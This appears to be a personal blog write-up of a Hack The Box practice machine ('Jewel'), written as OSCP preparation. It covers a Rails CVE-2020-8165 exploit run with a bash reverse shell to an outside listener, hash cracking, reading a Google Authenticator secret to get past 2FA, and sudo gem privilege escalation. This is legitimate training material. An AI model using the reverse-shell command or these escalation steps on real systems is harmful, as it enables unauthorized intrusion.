I am in the midst of my pursuit for the Offensive Security Certified Professional (OSCP) certification in May. Part of my preparation is to take on machines available on Hack The Box (HTB) platform. HTB is a great platform for practicing and learning new penetration testing skills as well as taking on the challenge of “capturing the flag” on their machines.

Jewel will be the first medium rated box I’m attempting. Let’s get right into it.

Prerequisites

I added the machine’s IP to make my /etc/hosts file for easier access to the target machine:

echo "10.10.10.211 jewel.htb" >> /etc/hosts

Reconnaissance

My first step would be to run a Nmap scan:

nmap -Pn -sC -sV -A -p- -oN initial 10.10.10.211 

From the results, I could infer that 2 web servers were running on port 8000 and 8080.

Port 8000:

Port 8080:

I further enumerated the webserver on port 8000 and found out that the app was running on Rails V 5.2.2.1.

Exploitation

Searching online, I found that this version is vulnerable to CVE-2020-8165. I found a Proof Of Concept (POC). To use the POC, I needed to generate a user account on the application. Hence, I visited port 8080 and created an account with the following credentials:

Username: hri@test.com | Password: hri. After setting this up, I was ready to use the POC.

I ran the command python3 exploit.py 10.10.10.211 8080 hri@test.com hri "bash -c 'bash -i >& /dev/tcp/10.10.14.69/4444 0>&1'" and opened a Netcat listener to catch shells.

Gaining Access

This method worked successfully, and I managed to gain access to the user account bill.

After gaining access, I stabilised my shell by connecting via SSH and started my privilege escalation hunt.

I used Linpeas for this process and it managed to find a password hash which belonged to bill.

Escalating Privileges

I copied the hash and cracked it using John the Ripper. The password was found: spongebob. Using the password found, I ran sudo -l to see how else I can advance. However, I was halted by a request for verification code:


I figured that this was 2-factor authentication. Hence, I started enumerating the machine further and found a hidden file, .google_authenticator, in bill’s home directory.

The contents of the file showed the authenticator code:2UQI3R52WFCLE6JTLDCSJYMJH4. I decided to download the phone app and was able to retrieve the code:

I was able to successfully gain access and run the sudo -l command smoothly:

From this, I inferred that bill could run gem with root privileges. Hence, I visited GTFOBins, which stated exactly how I could escalate privileges:

I used the command, successfully elevated my privileges and obtained the root hash:

I am so glad that I managed to solve my very first medium-tier box and am looking forward to conquering my next!